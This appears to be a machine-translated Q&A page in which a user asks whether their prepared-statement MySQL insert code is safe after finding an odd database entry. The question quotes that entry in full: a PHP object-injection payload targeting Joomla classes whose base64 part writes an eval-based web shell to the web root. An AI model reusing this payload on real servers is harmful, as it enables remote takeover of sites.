mysql - SQL 注入 我安全吗?
问题描述
今天我在我的sql数据库中看到了这个:
| *some data* | }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:
{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:
{}s:8:"feed_url";s:207:"
eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));
JFactory::getConfig();
exit;";
s:19:"cache_name_function";
s:6:"assert";s:5:"cache"
;b:1;s:11:"cache_class";
O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}� |
我正在使用此代码将数据放入数据库:
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$stmt = $conn->prepare("INSERT INTO $TABLE (VALUE, DEVICE) VALUES (?, ?)");
$stmt->bind_param("ss", $VALUE, $DEVICE);
$stmt->execute();
$stmt->close();
$conn->close();
?>
我安全吗?
我的代码是安全的还是应该添加另一层安全性?
解决方案
推荐阅读
- reactjs - 如何在 Nextjs 中导入两个组件
- docker - Gitlab CI。来自守护进程的错误响应:没有这样的图像
- protocol-buffers - 添加新消息后的 Proto2 编码/解码问题
- c - 为什么我在将 for 循环的乘积声明为 C 中的变量时收到此错误“错误:预期表达式”
- python - 当您知道嵌套键时访问嵌套字典?
- c++ - /d2vzeroupper MSVC 编译器优化标志在做什么?
- flutter - 我怎样才能制作这个 rtl - 颤动
- python - Numpy 获取具有当前值的邻居索引的最快方法(洪水填充)
- c# - 如何避免使用 EF Core 进行保存时的实体跟踪?
- python - 将 860 页从 PDF 转换为 jpeg,仅转换 175 页。使用 python wand.image